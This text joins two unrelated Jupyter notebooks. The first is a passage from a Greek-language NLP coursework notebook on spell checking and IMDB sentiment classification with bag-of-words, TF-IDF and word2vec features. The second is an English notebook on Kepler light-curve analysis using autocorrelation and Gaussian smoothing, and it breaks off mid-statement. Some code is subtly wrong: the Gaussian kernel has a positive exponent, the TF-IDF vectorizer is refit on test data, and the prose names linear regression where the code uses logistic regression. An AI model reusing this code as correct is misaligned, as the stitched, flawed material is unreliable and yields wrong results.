των 2 ορθογράφων δίνουμε ως είσοδο για διόρθωση την λέξη __qet__. ``` word = "qet" print(word + ":" + " ",end='') predict(word) print("1: ",end='') ! ./predict.sh spell_checker1.fst print(" 2: ",end='') ! ./predict.sh spell_checker2.fst ``` Παρατηρούμε ότι ο ορθογράφος με το word level γλωσσικό μοντέλο την διόρθωσε σε __get__, ενώ ο ορθογράφος με το unigram γλωσσικό μοντέλο την διόρθωσε σε __set__. Ο λόγος που συνέβη αυτό βρίσκεται στις πιθανότητες εμφάνισης κάθε λέξης αλλά και του συνολικού συνδυασμού των γραμμάτων κάθε λέξης. ``` print("Propability of word get: " + str(dict_token["get"])) print("Propability of word set: " + str(dict_token["set"])) print("Propability of characters g: " + str(dict_character["g"])) print("Propability of characters s: " + str(dict_character["s"])) ``` Βλέπουμε ότι η πιθανότητα να δούμε get είναι μεγαλύτερη από το να δούμε set και γι´ αυτό ο word-level ορθογράφος μας που κοιτάει τα word-level βάρη επέλεξε να διορθώσει το qet σε get. Από την άλλη η πιθανότητα να δούμε s είναι μεγαλύτερη από το να δούμε g με αποτέλεσμα ο 2ος ορθογράφος που βασίζεται στις πιθανότητες εμφάνισης των γραμάτων διορθώνει την λέξη qet σε set. <h2><center> Μέρος 2: Χρήση σημασιολογικών αναπαραστάσεων για ανάλυση συναισθήματος</center></h2> Στο πρώτο μέρος της άσκησης ασχοληθήκαμε κυρίως με συντακτικά μοντέλα για την κατασκευή ενός ορθογράφου. Εδώ θα ασχοληθούμε με τη __χρήση λεξικών αναπαραστάσεων για την κατασκευή ενός ταξινομητή συναισθήματος__ . Ως δεδομένα θα χρησιμοποιήσουμε σχόλια για ταινίες από την ιστοσελίδα IMDB και θα τα ταξινομήσουμε σε θετικά και αρνητικά ως προς το συναίσθημα. ### Βήμα 16: Δεδομένα και προεπεξεργασία __α)__ Αρχικά κατεβάζουμε τα δεδομένα που θα χρησιμοποιήσουμε. Επειδή το αρχείο είναι μεγάλο η εντολή είναι σε σχόλιο σε περίπτωση που υπάρχει ήδη κατεβασμένο. ``` # ! wget -N http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz ``` Στη συνέχεια το αποσυμπιέζουμε το αρχείου που κατεβάσαμε στον ίδιο φάκελο με το όνομα __aclImdb__. ``` # ! tar -zxf aclImdb_v1.tar.gz ``` Οι φάκελοι που μας ενδιαφέρουν είναι οι εξής: - __train__ που περιέχει όλες τις κριτικές που θα χρησιμοπιήσουμε για την εκπαίδευση του μοντέλου μας και χωρίζεται σε: - __train/pos__ το οποίο περιέχει αυτές που έχουν χαρακτηριστεί ως θετικές και - __train/neg__ το οποίο περιέχει αυτές που έχουν χαρακτηριστεί ως αρνητικές. - __test__ που περιέχει όλες τις κριτικές που θα χρησιμοποιήσουμε για να ελέγξουμε την επίδοση του μοντέλου μας και αντίστοιχα χωρίζεται σε: - __test/pos__ με τις θετικές και - __test/neg__ με τις αρνητικές. __β)__ Στη συνέχεια πρέπει να διαβάσουμε και να προεπεξεργαστούμε τα δεδομένα μας. Ο κώδικας ανάγνωσης και κάποιες απλές συναρτήσεις προεπεξεργασίας (τα οποία μας δώθηκαν έτοιμα για διευκόλυνση) παρουσιάζονται παρακάτω. - Αρχικά κάνουμε όλα τα απαραίτητα import. ``` import random import os import numpy as np import re try: import glob2 as glob except ImportError: import glob ``` - Στη συνέχεια δηλώνουμε τα path των αρχείων που θα μας φανούνε χρήσιμα και κάποιες ακόμη μεταβλητές. ``` # Useful paths data_dir = './aclImdb/' train_dir = os.path.join(data_dir, 'train') test_dir = os.path.join(data_dir, 'test') pos_train_dir = os.path.join(train_dir, 'pos') neg_train_dir = os.path.join(train_dir, 'neg') pos_test_dir = os.path.join(test_dir, 'pos') neg_test_dir = os.path.join(test_dir, 'neg') # For memory limitations. These parameters fit in 8GB of RAM. # If you have 16G of RAM you can experiment with the full dataset / W2V MAX_NUM_SAMPLES = 5000 # Load first 1M word embeddings. This works because GoogleNews are roughly # sorted from most frequent to least frequent. # It may yield much worse results for other embeddings corpora NUM_W2V_TO_LOAD = 1000000 # Fix numpy random seed for reproducibility SEED = 42 np.random.seed(42) ``` - Η συνάρτηση __strip_punctuation__ δέχεται ως είσοδο ένα string και αντικαθιστά κάθε σύμβολό του που δεν είναι γράμμα με το κενό. Έτσι επιστρέφει ένα string που αποτελείται μόνο από κεφαλαία και μικρά γράμματα και κενά. ``` def strip_punctuation(s): return re.sub(r'[^a-zA-Z\s]', ' ', s) ``` - Η συνάρτηση __preprocess__ δέχεται ένα string και απαλείφει τα σημεία στίξης χρησιμοποιώντας την strip_punctuation, μετατρέπει όλα τα γράμματα σε μικρά και, τέλος, αντικαθιστά τα συνεχόμενα κενά από ένα μόνο κενό. ``` def preprocess(s): return re.sub('\s+',' ', strip_punctuation(s).lower()) ``` - Η συνάρτηση __tokenize__ δέχεται ένα string και το διασπάσει στα κενά του, επιστρέφοντας μία λίστα με κάθε λέξη του string. ``` def tokenize(s): return s.split(' ') ``` - Η συνάρτηση __preproc_tok__ δέχεται ένα string και επιστρέφει μία λίστα με τα tokens, τις λέξεις δηλαδή μόνο με μικρά γράμματα και χωρίς σημεία στίξης. ``` def preproc_tok(s): return tokenize(preprocess(s)) ``` - Η συνάρτηση __read_samples__ δέχεται ως ορίσματα το path ενός φακέλου που περιέχει τα samples και μία συνάρτηση preprocess (με default μία συνάρτηση που επιστρέφει ακριβώς όπως είναι το όρισμά της). Ανοίγει κάθε ένα από τα samples που είναι σε μορφή αρχείων .txt και καλεί την συνάρτηση preprocess. Το αποτέλεσμα __data__ είναι μία λίστα, όπου κάθε στοιχείο της αντιστοιχεί στο αποτέλεσμα της preprocess πάνω στην κάθε κριτική. ``` def read_samples(folder, preprocess=lambda x: x): # Get all the .txt files that the folder contains samples = glob.iglob(os.path.join(folder, '*.txt')) data = [] for i, sample in enumerate(samples): if MAX_NUM_SAMPLES > 0 and i == MAX_NUM_SAMPLES: break # Open the .txt file, preprocess each line and add the result to a list with open(sample, 'r') as fd: x = [preprocess(l) for l in fd][0] data.append(x) return data ``` - Η συνάρτηση __create_corpus__ δέχεται δύο λίστες που περιέχουν κριτικές για ταινίες με την πρώτη να έχει τις θετικές κριτικές και την δεύτερη τις αρνητικές. Επιστρέφει μία λίστα που περιέχει τις δωσμένες κριτικές σε τυχαία σειρά και μία λίστα που περιέχει το label της κάθε κριτικής. Ουσιαστικά αυτή η συνάρτηση δημιουργεί το training και το test set μας σε raw μορφή αφού η κάθε γραμμή είναι μία κριτική σε μορφή ενός string. ``` def create_corpus(pos, neg): corpus = np.array(pos + neg) y = np.array([1 for _ in pos] + [0 for _ in neg]) indices = np.arange(y.shape[0]) np.random.shuffle(indices) return list(corpus), list(y) ``` Αφού ορίσαμε, λοιπόν, όλες μας τις συναρτήσεις τώρα πρέπει να διαβάσουμε τις κριτικές και την αντίστοιχη κατηγορία τους. Αυτό που θα κάνουμε είναι να δημιουργήσουμε τις εξής τέσσερις λίστες: - __X_train_raw__ η οποία περιέχει όλες τις κριτικές που θα χρησιμοποιηθούν για το train του μοντέλου μας σε text μορφή. - __Y_train__ η οποία περιέχει τα labels των παραπάνω κριτικών. - __X_test_raw__ η οποία περιέχει όλες τις κριτικές που θα χρησιμοποιηθούν για το test του μοντέλου μας σε text μορφή. - __Y_test__ η οποία περιέχει τα labels των παραπάνω κριτικών. ``` X_train_raw, Y_train = create_corpus(read_samples(pos_train_dir), read_samples(neg_train_dir)) X_test_raw, Y_test = create_corpus(read_samples(pos_test_dir), read_samples(neg_test_dir)) ``` Μπορούμε να ελέγξουμε την 1η κριτική του training set και το αντιστοιχο label της για να δούμε ότι όλα πήγαν καλά. ``` print(X_train_raw[0]) print("Postive" if Y_train[0] else "Negative") ``` ### Βήμα 17: Κατασκευή BOW αναπαραστάσεων και ταξινόμηση Η πιο βασική αναπαράσταση για μια πρόταση είναι η χρήση __Bag of Words__. Σε αυτή την αναπαράσταση μια λέξη κωδικοποιείται σαν ένα one hot encoding πάνω στο λεξιλόγιο και μια πρόταση σαν το άθροισμα αυτών των encodings. Για παράδειγμα στο λεξιλόγιο [cat, dog, eat] η αναπαράσταση της λέξης cat είναι [1, 0,0], της λέξης dog [0, 1, 0] κοκ. Η αναπαράσταση της πρότασης dog eat dog είναι [0, 2, 1]. Επιπλέον μπορούμε να πάρουμε σταθμισμένο άθροισμα των one hot word encodings για την αναπαράσταση μιας πρότασης με βάρη TF-IDF (https://en.wikipedia.org/wiki/Tf–idf). __α)__ Στην __Bag of Words__ αναπαράσταση υπολογίζουμε απλά πόσες φορές υπάρχει η κάθε λέξη στην κάθε κριτική. Έτσι, προκύπτει για κάθε κριτική ένας μεγάλος και αραιός πίνακας (με μήκος ίσο με το μέγεθος του λεξικου) που σε κάθε θέση του έχει τις φορές που παρουσιάζεται η κάθε λέξη στην κριτική. Αυτή η αναπαράσταση έχει δύο σημαντικά μειονεκτήματα τα οποία αντιμετωπίζονται με την προσθήκη βαρών __TF_IDF__. Συγκεκριμένα έχουμε ότι: - Πρέπει να λαμβάνουμε υπόψιν και το μέγεθος της κάθε κριτικής γιατί άλλη βαρύτητα έχει η ύπαρξη μιας λέξης σε μία κριτική με μικρό μέγεθος και άλλη σε μία με μεγάλο. Γι' αυτό και στον πρώτο όρο της TF_IDF που είναι το __term frequency__ αφού υπολογίσουμε πόσες φορές υπάρχει μία λέξη στην κριτική, μετά διαιρούμε με τον συνολικό μέγεθος της κριτικής. - Λέξεις οι οποίες είναι συνηθισμένες λαμβάνουν μεγάλο score σε κάθε κριτική χωρίς να πρέπει. Το νόημα είναι ότι οι σπάνιες λέξεις μας δίνουν περισσότερη πληροφορία από τις συνηθισμένες. Έτσι, ο δεύτερος όρος που είναι το __inverse document frequency__ είναι ο συνολικός αριθμός των κριτικών διαιρεμένος από τον αριθμό των κριτικών στις οποίες βρίσκεται η λέξη μας, με αποτέλεσμα ο όρος αυτός να αυξάνεται όσο πιο σπάνια είναι η λέξη. __β)__ Τώρα θα χρησιμοποιήσουμε τον transformer CountVectorizer του sklearn για να εξάγουμε __μη σταθμισμένες BOW αναπαραστάσεις__. ``` from sklearn.feature_extraction.text import CountVectorizer # Define the vectorizer using our preprocess and tokenize function. vectorizer = CountVectorizer(analyzer = preproc_tok) # Get training data X_train. X_train = vectorizer.fit_transform(X_train_raw) # Get test data X_test. X_test = vectorizer.transform(X_test_raw) ``` __γ)__ Σε αυτό το στάδιο έχουμε τους πίνακες με τα training και τα test data και τα αντίστοιχα labels. Οπότε μπορούμε να εφαρμόσουμε τον ταξινομητή Linear Regression του sklearn για να ταξινομήσουμε τα σχόλια σε θετικά και αρνητικά. ``` from sklearn.linear_model import LogisticRegression from sklearn.metrics import zero_one_loss # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` __δ)__ Τώρα θα επαναλάβουμε την ίδια διαδικασία χρησιμοποιώντας τον TfidfVectorizer για την εξαγώγη TF-IDF αναπαραστάσεων. ``` from sklearn.feature_extraction.text import TfidfVectorizer tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_train = tfidf_vectorizer.fit_transform(X_train_raw) X_test = tfidf_vectorizer.transform(X_test_raw) # Define the clasifier clf_tfidf = LogisticRegression() # Train the model clf_tfidf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf_tfidf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf_tfidf.predict(X_test))) ``` #### Σύγκριση αποτελεσμάτων: Παρατηρούμε ότι το test error μειώνεται κατά 1% περίπου όταν χρησιμοποιούμε βάρη TF-IDF για την αναπαράσταση μιας πρότασης. Το αποτέλεσμα αυτό ήταν αναμενόμενο γιατί όπως ειπώθηκε στο α) η αναπαράσταση αυτή καλύπτει κάποια κενά που είχε η μη σταθμισμένη BOW αναπαράσταση. ### Βήμα 18: Χρήση Word2Vec αναπαραστάσεων για ταξινόμηση Ένας άλλος τρόπος για να αναπαραστήσουμε λέξεις και προτάσεις είναι να κάνουμε χρήση προεκπαιδευμένων embeddings. Σε αυτό το βήμα θα εστιάσουμε στα word2vec embeddings. Αυτά τα embeddings προκύπτουν από ένα νευρωνικό δίκτυο με ένα layer το οποίο καλείται να προβλέψει μια λέξη με βάση το context της (παράθυρο 3-5 λέξεων γύρω από αυτή). Αυτό ονομάζεται CBOW μοντέλο. Εναλλακτικά το δίκτυο καλείται να προβλέψει το context με βάση τη λέξη (skip-gram μοντέλο). Τα word2vec vectors είναι πυκνές (dense) αναπαραστάσεις σε λιγότερες διαστάσεις από τις BOW και κωδικοποιούν σημασιολογικά χαρακτηριστικά μιας λέξης με βάση την υπόθεση ότι λέξεις με παρόμοιο νόημα εμφανίζονται σε παρόμοια συγκείμενα (contexts). Μια πρόταση μπορεί να αναπαρασταθεί ως ο μέσος όρος των w2v διανυσμάτων κάθε λέξης που περιέχει (Neural Bag of Words). Αρχικά θα επαναλάβουμε τα βήματα 9α, 9β της προπαρασκευής γιατί θα μας χρειαστούν για τα δύο πρώτα ερωτήματα. - Διαβάζουμε το βιβλίο War of the Worlds που είχαμε κατεβάσει για το μέρος Α σε μία λίστα από tokenized προτάσεις. ``` import nltk # We split the corpus in a list of tokenized sentences. file_path = "War.txt" tokenized_sentences = [] with open(file_path, "r") as f: text = f.read() sentences = nltk.sent_tokenize(text) tokenized_sentences = [preproc_tok(sentence) for sentence in sentences] ``` - Xρησιμοποιούμε την κλάση Word2Vec του gensim για να εκπαιδεύσουμε 100-διάστατα word2vec embeddings με βάση τις παραπάνω προτάσεις. Θα χρησιμοποιήσουμε window = 5 και 1000 εποχές. ``` from gensim.models import Word2Vec # Initialize word2vec. Context is taken as the 2 previous and 2 next words myModel = Word2Vec(tokenized_sentences, window=5, size=100, workers=4) # Train the model for 1000 epochs myModel.train(tokenized_sentences, total_examples=len(tokenized_sentences), epochs=1000) ``` Η μεταβλητή __voc__ κρατάει το λεξικό μας ενώ η __dim__ το μέγεθος του κάθε embedding. ``` # get ordered vocabulary list voc = myModel.wv.index2word # get vector size dim = myModel.vector_size ``` Η συνάρτηση __to_embeddings_Matrix__ δέχεται ως όρισμα το μοντέλο μας και επιστρέφει έναν 2-διάστατο πίνακα όπου κάθε γραμμή αναπαριστάσει ένα embedding και ένα λεξικό. ``` # Convert to numpy 2d array (n_vocab x vector_size) def to_embeddings_Matrix(model): embedding_matrix = np.zeros((len(model.wv.vocab), model.vector_size)) for i in range(len(model.wv.vocab)): embedding_matrix[i] = model.wv[model.wv.index2word[i]] return embedding_matrix, model.wv.index2word ``` __α)__ Σε αυτό το βήμα πρέπει να υπολογίσουμε το ποσοστό __out of vocabulary (OOV) words__ για τις παραπάνω αναπαραστάσεις. ``` tokens = get_tokens("War.txt") oov = (1 - len(voc)/len(tokens)) * 100 print("Out of vocabulary words: " + str(oov) + "%") ``` __β)__ Τώρα χρησιμποιώντας αυτές τις αναπαραστάσεις θα κατασκευάσουμε ένα __Neural Bag of Words αναπαραστάσεων__ για κάθε σχόλιο στο corpus και θα εκπαιδεύσουμε ένα Logistic Regression μοντέλο για ταξινόμηση. Αρχικά, αποθηκεύουμε τo training και το test set σε raw text μορφή. ``` X_train_raw, Y_train = create_corpus(read_samples(pos_train_dir), read_samples(neg_train_dir)) X_test_raw, Y_test = create_corpus(read_samples(pos_test_dir), read_samples(neg_test_dir)) ``` Στη συνέχεια, για κάθε κριτική υπολογίζουμε το neural bag of words, που ορίζεται ως ο μέσος όρος των w2v διανυσμάτων κάθε λέξης που περιέχει. ``` # Initialize training set X_train = np.zeros((len(X_train_raw), 100)) for row, sample in enumerate(X_train_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in myModel.wv: X_train[row] += myModel.wv[tok] words_included += 1 # Get the mean value X_train[row] = X_train[row]/words_included # Initialize test set X_test = np.zeros((len(X_test_raw), 100)) for row, sample in enumerate(X_test_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in myModel.wv: X_test[row] += myModel.wv[tok] words_included += 1 # Get the mean value X_test[row] = X_test[row]/words_included # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` Και τα δύο error είναι πάρα πολύ υψηλά με αποτέλεσμα το μοντέλο μας να έχει πάρα πολύ χαμηλή απόδοση. Η εξήγηση για αυτό είναι ότι έχουμε κατασκευάσει τα word embeddings με βάση ένα πάρα πολύ μικρό corpus το οποίο και έχει μικρό λεξικό (με αποτέλεσμα πολλές λέξεις να μην έχουν αναπαράσταση) και δεν βοηθάει στο να δημιουργηθούν παρόμοιες αναπαραστάσεις για κοντινά σημασιολογικά λέξεις (αυτό το παρατηρήσαμε και στην προπαρασκευή όταν είδαμε τις κοντινές σημασιολογικά λέξεις 10 τυχαίων λέξεν). __γ, δ)__ Κατεβάζουμε το προεκπαιδευμένα GoogleNews vectors, τα φορτώνουμε με το gensim και εξάγουμε αναπαραστάσεις με βάση αυτά. ``` from gensim.models import KeyedVectors googleModel = KeyedVectors.load_word2vec_format('./GoogleNews-vectors-negative300.bin',binary=True, limit=NUM_W2V_TO_LOAD) ``` Επαναλαμβάνουμε το ερώτημα 9γ της προπαρασκευής για να το συγκρίνουμε με τα GoogleNews. ``` selected_words = random.sample(voc, 10) for word in selected_words: # get most similar words sim = myModel.wv.most_similar(word, topn=5) print('"' + word + '"' + " is similar with the following words:") for s in sim: print('"' + s[0] + '"' + " with similarity " + str(s[1])) print() for word in selected_words: # get most similar words sim = googleModel.most_similar(word, topn=5) print('"' + word + '"' + " is similar with the following words:") for s in sim: print('"' + s[0] + '"' + " with similarity " + str(s[1])) print() ``` Αυτό που παρατηρούμε είναι ότι προφανώς με τα Google Vectors τα αποτελέσματα είναι εντυπωσικά αφού όλες οι κοντινές λέξεις είναι και στην πραγματικότητα πολύ κοντινές. Από την άλλη, το δικό μας μοντέλο έχει πολύ χαμηλές επιδόσεις που οφείλεται στο γεγονός ότι τα embeddings προέκυψαν από πολύ μικρό corpus. Τα Google Vectors από την άλλη έχουν ένα τεράστιο corpus από πίσω με αποτέλεσμα και να έχει τεράστιο λεξικό αλλά και οι σημασιολογικά κοντινές λέξεις να έχει και παρόμοια αναπαράσταση. __ε)__ Αντίστοιχα με το myModel τώρα θα εκπαιδεύσουμε ένα Logistic Regression ταξινομητή με το μοντέλο που προέκυψε από τα Google Vectors. ``` # Initialize training set X_train = np.zeros((len(X_train_raw), 300)) for row, sample in enumerate(X_train_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel: X_train[row] += googleModel[tok] words_included += 1 # Get the mean value X_train[row] = X_train[row]/words_included # Initialize test set X_test = np.zeros((len(X_test_raw), 300)) for row, sample in enumerate(X_test_raw): words_included = 0 # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel: X_test[row] += googleModel[tok] words_included += 1 # Get the mean value X_test[row] = X_test[row]/words_included # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ``` Όπως ήταν αναμενόμενο το error μειώθηκε κατά πολύ καθώς τώρα τα embeddings ήταν καλύτερα. Σε σύγκριση με το TF_IDF το error εδώ είναι λίγο μεγαλύτερο αλλά κερδίζουμε πολύ σε χώρο και χρόνο καθώς οι πίνακες με τα training και test data είναι πολύ πιο μικροί και πυκνοί. __στ)__ Τώρα θα δημιουργήσουμε αναπαραστάσεις των κριτικών με χρήση σταθμισμένου μέσου των w2v αναπαραστάσεων των λέξεων. Ως βάρη θα χρησιμοποιήσουμε τα TF-IDF βάρη των λέξεων. ``` # Get the vocabulary of the words in the training set # that contains their tf-idf value. tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_train_temp = tfidf_vectorizer.fit_transform(X_train_raw) voc = tfidf_vectorizer.vocabulary_ # Do the same as before but now, we multiply each represantation by a the tf-idf of the word. # Initialize training set X_train = np.zeros((len(X_train_raw), 300)) for row, sample in enumerate(X_train_raw): # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel and tok in voc: X_train[row] += googleModel[tok] * X_train_temp[row,voc[tok]] # Get the vocabulary of the words in the training set # that contains their tf-idf value. tfidf_vectorizer = TfidfVectorizer(analyzer = preproc_tok) X_test_temp = tfidf_vectorizer.fit_transform(X_test_raw) voc = tfidf_vectorizer.vocabulary_ # Do the same as before but now, we multiply each represantation by a the tf-idf of the word. # Initialize test set X_test = np.zeros((len(X_test_raw), 300)) for row, sample in enumerate(X_test_raw): # Tokenize current review sample_toks = preproc_tok(sample) for tok in sample_toks: # For each token check if it has a w2v representation # and if yes add it. if tok in googleModel and tok in voc: X_test[row] += googleModel[tok] * X_test_temp[row,voc[tok]] ``` __ζ)__ Επαναλαμβάνουμε την ταξινόμηση με τις νέες αναπαραστάσεις. ``` # Define the clasifier clf = LogisticRegression() # Train the model clf.fit(X_train, Y_train) # Compute error on training data. print("Training error =", zero_one_loss(Y_train, clf.predict(X_train))) # Compute error on test data print("Test error =", zero_one_loss(Y_test, clf.predict(X_test))) ```
github_jupyter
# Time Series approach ### Methods to be used: - Auto Correlation Function - Smoothing via handcrafted Gaussian Kernel - Gaussian Process Regression - Cross Validation - Lomb Scargle (Fast and Generalized) - Wavelets ``` import os import sys import numpy as np import scipy import pandas as pd import pywt import matplotlib.pyplot as plt # Fro pretty printing import pprint # For lag plot from pandas.plotting import lag_plot # For ACF import statsmodels from statsmodels.tsa.stattools import acf # For zoom-in inside the plot box from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes from mpl_toolkits.axes_grid1.inset_locator import mark_inset # Gridspec import matplotlib.gridspec as gridspec # Vaex for lightweight plotting import vaex as vx # Gaussian Process from sklearn.gaussian_process import GaussianProcessRegressor from sklearn.gaussian_process.kernels import (RBF, Matern, RationalQuadratic, ExpSineSquared, DotProduct, ConstantKernel, WhiteKernel) # Cross validation from sklearn.model_selection import GridSearchCV %matplotlib notebook try: import gatspy except: !{sys.executable} -m pip install gatspy --user # !conda install --yes --prefix {sys.prefix} gatspy ``` ### Importing data, using Kepler light curves Import a random Kepler light curve. Time is in days, flux is a relative scale. ``` data_list = ['DataV_koi_kplr005706966.csv', 'DataV_koi_kplr003348082.csv', 'DataV_koi_kplr003656121.csv', 'DataV_koi_kplr004135665.csv', 'DataV_koi_kplr002302548.csv', 'DataV_koi_kplr006846911.csv', 'DataV_koi_kplr006948054.csv', 'DataV_koi_kplr008030339.csv', 'DataV_koi_kplr008884274.csv', 'DataV_koi_kplr009150870.csv', 'DataV_koi_kplr009153554.csv', 'DataV_koi_kplr011442793.csv',] fname = os.path.join('lc_data', data_list[0]) lc_x = pd.read_csv(fname, names=['time', 'flux', 'e_flux'], nrows=15000, engine='python') npt_lsst = np.ceil(np.ptp(lc_x.time.values) / 1.6).astype('int') lc_x2 = lc_x[::npt_lsst] lc_x2.reset_index(drop=True, inplace=True) ``` Getting the sampling rate (cadence), we will need it after to scale measurements to day scales ``` cad1 = np.median(np.ediff1d(lc_x['time'].values)) cad2 = np.median(np.ediff1d(lc_x2['time'].values)) print('Kepler sampling: {0:.2f} d, LSST-like sampling:{1:.2f} d'.format(cad1, cad2)) ``` Quick visualization, both Kepler sample-like and LSST sample-like (best scenario) ``` fig, ax = plt.subplots(figsize=(6, 4)) ax.scatter(lc_x.time, lc_x.flux, marker='o', s=5, c=lc_x.e_flux, cmap='jet') ax.scatter(lc_x2.time, lc_x2.flux, marker='.', s=50, c='lime', edgecolor='k', lw=0.5) ax.set_xlabel('time d') ax.set_ylabel(r'flux$_{normalized}$') ax.set_ylim([np.min(lc_x.flux) - np.std(lc_x.flux), np.max(lc_x.flux) + np.std(lc_x.flux)]) ax.set_title('Same LC with different cadences', color='navy') ``` ### Import light curves into vaex ``` # Whole set ds_all = vx.from_ascii(fname, seperator=",", names=['time', 'flux', 'e_flux']) ds_K = vx.from_pandas(lc_x, name='kplr') ds_L = vx.from_pandas(lc_x2, name='lsst') fig, ax = plt.subplots(1, 2, figsize=(10, 4)) # Set first subplot as active plt.sca(ax[0]) ds_all.scatter('time', 'flux', c='k', alpha=0.6, s=0.1, length_limit=len(ds_all)) delta_yr = np.ptp(ds_all.minmax('time')) / 365 ax[0].set_title(r'Whole LC, $\Delta$={0:.2f} yr'.format(delta_yr)) ax[0].axvline(ds_K.max('time'), color='yellowgreen', lw=2) # Now second plot plt.sca(ax[1]) ds_K.scatter('time', 'flux', c='dodgerblue', alpha=0.6, s=1) ds_L.scatter('time', 'flux', c='orange', alpha=1, s=20, edgecolor='k') delta_yr = np.ptp(ds_K.minmax('time')) / 365 ax[1].set_title(r'Subsection of $\Delta$={0:.2f} yr'.format(delta_yr), color='navy') print(ds_K.minmax('time')) ``` Quick checking: lag plot should be random for structures with no memory. The correlation here is a sanity check **This relates to... memory of the system!** ``` plt.close('all') fig, ax = plt.subplots(1, 2, figsize=(6, 3)) lag1 = lag_plot(lc_x.flux, ax=ax[0], marker='.', c='goldenrod', edgecolor='k', lw=0.1) lag2 = lag_plot(lc_x2.flux, ax=ax[1], marker='.', c='dodgerblue', edgecolor='k', lw=0.1) # for sub in ax: sub.set_aspect('equal') ax[0].set_title('Kepler sampling') ax[1].set_title('LSST-like sampling') plt.subplots_adjust(wspace=0.55) ``` ## Autocorrelation Function It is safe to only look for periods shorter than half the light curve, $k \leq \frac{N}{2}$ Calculate the autocorrelation coefficients via statsmodels. Note that the `tsa.stattools.acf` method receives only the flux, thus assuming the spacing between each observation is uniform. ``` acf_coeffs = acf(lc_x.flux.values, unbiased=False, nlags=len(lc_x.flux.values) // 2) tau_k = np.arange(1, acf_coeffs.size + 1, 1) t_d = cad1 * tau_k # print('Number of coefficients from the ACF calculation is: {0}'.format(acf_coeffs.size)) fig, ax = plt.subplots(1, 2, figsize=(10, 4)) # Raw results from ACF are 'coarse', because of the nature of the input data ax[0].scatter(tau_k, acf_coeffs, marker='.', s=10, color='navy') # Zoom in if 1: zoom_factor = 60 ax0_zoom = zoomed_inset_axes(ax[0], zoom_factor, loc=1) # ax0_zoom.scatter(tau_k, acf_coeffs, marker='.', s=20, color='darkorange') ax0_zoom.plot(tau_k, acf_coeffs, ',-', lw=2, color='darkorange') ax0_zoom.set_xlim(3213, 3274) ax0_zoom.set_ylim(0.375, 0.383) ## Remove tick labels ax0_zoom.xaxis.set_major_formatter(plt.NullFormatter()) ax0_zoom.yaxis.set_major_formatter(plt.NullFormatter()) mark_inset(ax[0], ax0_zoom, loc1=2, loc2=4, fc='none', ec='goldenrod') # # Maxima for the coefficients aux_maxima = scipy.signal.argrelextrema(acf_coeffs, np.greater) ax[1].scatter(t_d, acf_coeffs, marker='.', s=10, color='lightgray') ax[1].scatter(t_d[aux_maxima], acf_coeffs[aux_maxima], marker='^', s=20, color='lime', edgecolor='k', linewidths=0.1) # for axis in ax: axis.set_ylabel(r'$\rho$', fontsize=13) ax[0].set_xlabel(r'$\tau$', fontsize=13) ax[1].set_xlabel(r'time $d$', fontsize=13) # ax[0].set_title('ACF coefficients') ax[1].set_title('Location of local maxima') plt.suptitle('Kepler sampling') ``` **Smooth the ACF coefficient distribution to easyly locate the local maxima. ** ``` def gaussian(mu, sigma, x): return np.exp(np.power(-(x - mu), 2) / (2 * np.power(sigma, 2))) / (sigma * np.sqrt(2 * np.pi)) ``` Values for the Gaussian (convolution) are empirical, as a compromise between diminish noise and keep the ACF signal. Note we need to trim a bit the result array, due to border padding. Also, remember the normalization, to keep the scale. A suggestion from literature (McQuillan + 2013): ``` sigma_x = 18 / 2.35 x = np.arange(0, 56, 1) ``` ``` sigma_x = 18 / 2.35 x = np.arange(0, 56, 1) acf_g_conv = scipy.signal.convolve(acf_coeffs, gaussian(0, sigma_x, x)) / np.sum(gaussian(0, sigma_x, x)) print('Original size of the ACF coefficients array: {0}. The smoothed: {1}'.format(acf_coeffs.size, acf_g_conv.size)) # Trim the padded extra section, and re-use the previously defined inteval tau_k Ntrim = acf_g_conv.size - acf_coeffs.size acf_g_conv = acf_g_conv[Ntrim:] # Local maxima aux_maxima = scipy.signal.argrelextrema(acf_g_conv, np.greater) # Global maxima idx_gmax = np.argmax(acf_g_conv[aux_maxima]) # Grid fig = plt.figure(figsize=(5, 4)) gs1 = gridspec.GridSpec(3, 3) gs1.update(left=0.16, right=0.98, hspace=0.05) ax0 = fig.add_subplot(gs1[: -1, :]) ax1 = fig.add_subplot(gs1[-1, :], sharex=ax0) # ax1.scatter(t_d, acf_g_conv - acf_coeffs, marker='*', s=10, color='orange') # ax0.scatter(t_d, acf_g_conv, marker='.', s=10, color='lightgray') ax0.scatter(t_d[aux_maxima], acf_g_conv[aux_maxima], marker='^', s=20, color='lime', edgecolor='k', linewidths=0.1) # ax0.axvline(t_d[aux_maxima][idx_gmax], lw=2, c='b', alpha=0.5) # ax0.set_ylabel(r'$\rho$', fontsize=13) ax1.set_xlabel(r'time $d$', fontsize=13) ax1.set_ylabel(r'Gauss - ACF', fontsize=13) max_acf_kplr = 